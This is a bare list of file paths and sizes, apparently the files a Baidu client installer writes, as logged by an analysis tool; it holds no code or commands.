%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\rpt.dat (222 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
